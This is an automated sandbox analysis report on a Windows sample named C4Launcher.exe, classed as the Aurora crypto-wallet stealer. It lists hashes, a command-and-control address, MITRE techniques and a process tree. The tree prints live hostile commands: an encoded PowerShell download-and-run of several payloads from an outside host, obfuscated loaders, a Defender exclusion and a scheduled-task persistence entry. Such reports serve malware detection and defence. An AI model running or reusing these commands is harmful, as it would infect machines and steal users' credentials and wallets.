aurora | 1b73240f522c59e275e524dac1aec41bd06a9aba0a894f90744129da2aa955f9

Analysis

max time kernel
150s
max time network
34s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
03-04-2023 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Launcher.exe
Size

855KB
MD5

18014fc649434b87bc636b177c3681fa
SHA1

7b021861b19aa3f9d8ee155b0b7b7393e1e09b61
SHA256

5602954abc2dc945783dcba2d749d801f88f790fca8b3eeef99ca493a2a2763b
SHA512

46535652f7559da293c5e9e5c03d48d8417dea6e4d1012a67bae1b0da45c6c5ad76ea0d17968b87c6fbd3963b7708640136f8477ff69a867a3aeb4fd3b0dcd38
SSDEEP

3072:NBAN1gjFgmYSg25SYDGFHUNR1ZvhfKEaO7j9fDgjMKs:4egmLgmCeNXfPJDQMKs

Score

10^/10

aurora evasion spyware stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

Processes:

SmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 1692 created 1248	1692	SmartDefRun.exe	Explorer.EXE
PID 1692 created 1248	1692	SmartDefRun.exe	Explorer.EXE
PID 1692 created 1248	1692	SmartDefRun.exe	Explorer.EXE
PID 1692 created 1248	1692	SmartDefRun.exe	Explorer.EXE
PID 1332 created 420	1332	powershell.EXE	winlogon.exe

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2004 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 5 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exe

pid process

888 C4Loader.exe
1660 new2.exe
1048 SysApp.exe
1692 SmartDefRun.exe
960 fodhelper.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exeWMIC.exe

pid process

2004 powershell.exe
2004 powershell.exe
2004 powershell.exe
2004 powershell.exe
2004 WMIC.exe
2004 WMIC.exe
2004 WMIC.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
4	2004	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
888	C4Loader.exe
1660	new2.exe
1048	SysApp.exe
1692	SmartDefRun.exe
960	fodhelper.exe

Drops file in System32 directory 6 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Telemetry Logging	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

C4Launcher.exeSmartDefRun.exepowershell.EXE

description	pid	process	target process
PID 2000 set thread context of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 1692 set thread context of 988	1692	SmartDefRun.exe	dialer.exe
PID 1332 set thread context of 632	1332	powershell.EXE	dllhost.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1556 sc.exe
272 sc.exe
1740 sc.exe
524 sc.exe
692 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

320 schtasks.exe
2004 schtasks.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

description	ioc	process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

pid	process
1556	sc.exe
272	sc.exe
1740	sc.exe
524	sc.exe
692	sc.exe

pid	process
320	schtasks.exe
2004	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e055ff4e5866d901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeWMIC.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exepowershell.EXEpowershell.EXEdllhost.exe

pid	process
2004	powershell.exe
2004	powershell.exe
2004	powershell.exe
2004	WMIC.exe
2004	WMIC.exe
2004	WMIC.exe
2004	WMIC.exe
1692	SmartDefRun.exe
1692	SmartDefRun.exe
1816	powershell.exe
1692	SmartDefRun.exe
1692	SmartDefRun.exe
1692	SmartDefRun.exe
1692	SmartDefRun.exe
1712	powershell.exe
1692	SmartDefRun.exe
1692	SmartDefRun.exe
1048	SysApp.exe
1048	SysApp.exe
1048	SysApp.exe
1048	SysApp.exe
1048	SysApp.exe
1332	powershell.EXE
884	powershell.EXE
1332	powershell.EXE
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe
632	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exewmic.exepowershell.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeIncreaseQuotaPrivilege	1956	wmic.exe
Token: SeSecurityPrivilege	1956	wmic.exe
Token: SeTakeOwnershipPrivilege	1956	wmic.exe
Token: SeLoadDriverPrivilege	1956	wmic.exe
Token: SeSystemProfilePrivilege	1956	wmic.exe
Token: SeSystemtimePrivilege	1956	wmic.exe
Token: SeProfSingleProcessPrivilege	1956	wmic.exe
Token: SeIncBasePriorityPrivilege	1956	wmic.exe
Token: SeCreatePagefilePrivilege	1956	wmic.exe
Token: SeBackupPrivilege	1956	wmic.exe
Token: SeRestorePrivilege	1956	wmic.exe
Token: SeShutdownPrivilege	1956	wmic.exe
Token: SeDebugPrivilege	1956	wmic.exe
Token: SeSystemEnvironmentPrivilege	1956	wmic.exe
Token: SeRemoteShutdownPrivilege	1956	wmic.exe
Token: SeUndockPrivilege	1956	wmic.exe
Token: SeManageVolumePrivilege	1956	wmic.exe
Token: 33	1956	wmic.exe
Token: 34	1956	wmic.exe
Token: 35	1956	wmic.exe
Token: SeIncreaseQuotaPrivilege	1956	wmic.exe
Token: SeSecurityPrivilege	1956	wmic.exe
Token: SeTakeOwnershipPrivilege	1956	wmic.exe
Token: SeLoadDriverPrivilege	1956	wmic.exe
Token: SeSystemProfilePrivilege	1956	wmic.exe
Token: SeSystemtimePrivilege	1956	wmic.exe
Token: SeProfSingleProcessPrivilege	1956	wmic.exe
Token: SeIncBasePriorityPrivilege	1956	wmic.exe
Token: SeCreatePagefilePrivilege	1956	wmic.exe
Token: SeBackupPrivilege	1956	wmic.exe
Token: SeRestorePrivilege	1956	wmic.exe
Token: SeShutdownPrivilege	1956	wmic.exe
Token: SeDebugPrivilege	1956	wmic.exe
Token: SeSystemEnvironmentPrivilege	1956	wmic.exe
Token: SeRemoteShutdownPrivilege	1956	wmic.exe
Token: SeUndockPrivilege	1956	wmic.exe
Token: SeManageVolumePrivilege	1956	wmic.exe
Token: 33	1956	wmic.exe
Token: 34	1956	wmic.exe
Token: 35	1956	wmic.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	WMIC.exe
Token: SeSecurityPrivilege	2016	WMIC.exe
Token: SeTakeOwnershipPrivilege	2016	WMIC.exe
Token: SeLoadDriverPrivilege	2016	WMIC.exe
Token: SeSystemProfilePrivilege	2016	WMIC.exe
Token: SeSystemtimePrivilege	2016	WMIC.exe
Token: SeProfSingleProcessPrivilege	2016	WMIC.exe
Token: SeIncBasePriorityPrivilege	2016	WMIC.exe
Token: SeCreatePagefilePrivilege	2016	WMIC.exe
Token: SeBackupPrivilege	2016	WMIC.exe
Token: SeRestorePrivilege	2016	WMIC.exe
Token: SeShutdownPrivilege	2016	WMIC.exe
Token: SeDebugPrivilege	2016	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2016	WMIC.exe
Token: SeRemoteShutdownPrivilege	2016	WMIC.exe
Token: SeUndockPrivilege	2016	WMIC.exe
Token: SeManageVolumePrivilege	2016	WMIC.exe
Token: 33	2016	WMIC.exe
Token: 34	2016	WMIC.exe
Token: 35	2016	WMIC.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeIncreaseQuotaPrivilege	2016	WMIC.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

864 svchost.exe

pid	process
864	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Launcher.exeInstallUtil.exepowershell.exeWMIC.exenew2.execmd.execmd.exe

description	pid	process	target process
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 2000 wrote to memory of 1060	2000	C4Launcher.exe	InstallUtil.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 1060 wrote to memory of 2004	1060	InstallUtil.exe	powershell.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 888	2004	powershell.exe	C4Loader.exe
PID 2004 wrote to memory of 1660	2004	powershell.exe	new2.exe
PID 2004 wrote to memory of 1660	2004	powershell.exe	new2.exe
PID 2004 wrote to memory of 1660	2004	powershell.exe	new2.exe
PID 2004 wrote to memory of 1660	2004	powershell.exe	new2.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1048	2004	WMIC.exe	SysApp.exe
PID 2004 wrote to memory of 1692	2004	WMIC.exe	SmartDefRun.exe
PID 2004 wrote to memory of 1692	2004	WMIC.exe	SmartDefRun.exe
PID 2004 wrote to memory of 1692	2004	WMIC.exe	SmartDefRun.exe
PID 2004 wrote to memory of 1692	2004	WMIC.exe	SmartDefRun.exe
PID 1660 wrote to memory of 1956	1660	new2.exe	wmic.exe
PID 1660 wrote to memory of 1956	1660	new2.exe	wmic.exe
PID 1660 wrote to memory of 1956	1660	new2.exe	wmic.exe
PID 1660 wrote to memory of 1644	1660	new2.exe	cmd.exe
PID 1660 wrote to memory of 1644	1660	new2.exe	cmd.exe
PID 1660 wrote to memory of 1644	1660	new2.exe	cmd.exe
PID 1644 wrote to memory of 2016	1644	cmd.exe	WMIC.exe
PID 1644 wrote to memory of 2016	1644	cmd.exe	WMIC.exe
PID 1644 wrote to memory of 2016	1644	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 1740	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1740	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1740	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 692	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 692	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 692	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1556	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1556	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 1556	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 272	1584	cmd.exe	sc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:468
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:684
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of UnmapMainImage
  PID:864
- - \\?\C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    3⤵
    PID:1820
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {6453AB17-4398-4FE9-9906-4D4D55F51DD1} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    PID:1216
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+'ale'+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:1332
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {09689AFA-8D69-468E-9C8E-E9269FDC274E} S-1-5-21-1563773381-2037468142-1146002597-1000:YBHADZIG\Admin:Interactive:[1]
    3⤵
    PID:1960
  - - C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
      4⤵
      Executes dropped EXE
      PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1084
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:804
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:940
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1120
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:756
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:328
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:1000
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:824
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:764
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:604

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e5323e94-f8c5-4d6d-8dc7-6a4d4dbe299e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:632

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1248
- C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe
  "C:\Users\Admin\AppData\Local\Temp\C4Launcher.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:888
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1660
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Caption
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
      - C:\Windows\system32\cmd.exe
        
        cmd /C "wmic path win32_VideoController get name"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1644
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2016
      - C:\Windows\system32\cmd.exe
        
        cmd /C "wmic cpu get name"
        6⤵
        
        PID:1976
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        7⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1048
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1816
- C:\Windows\System32\cmd.exe
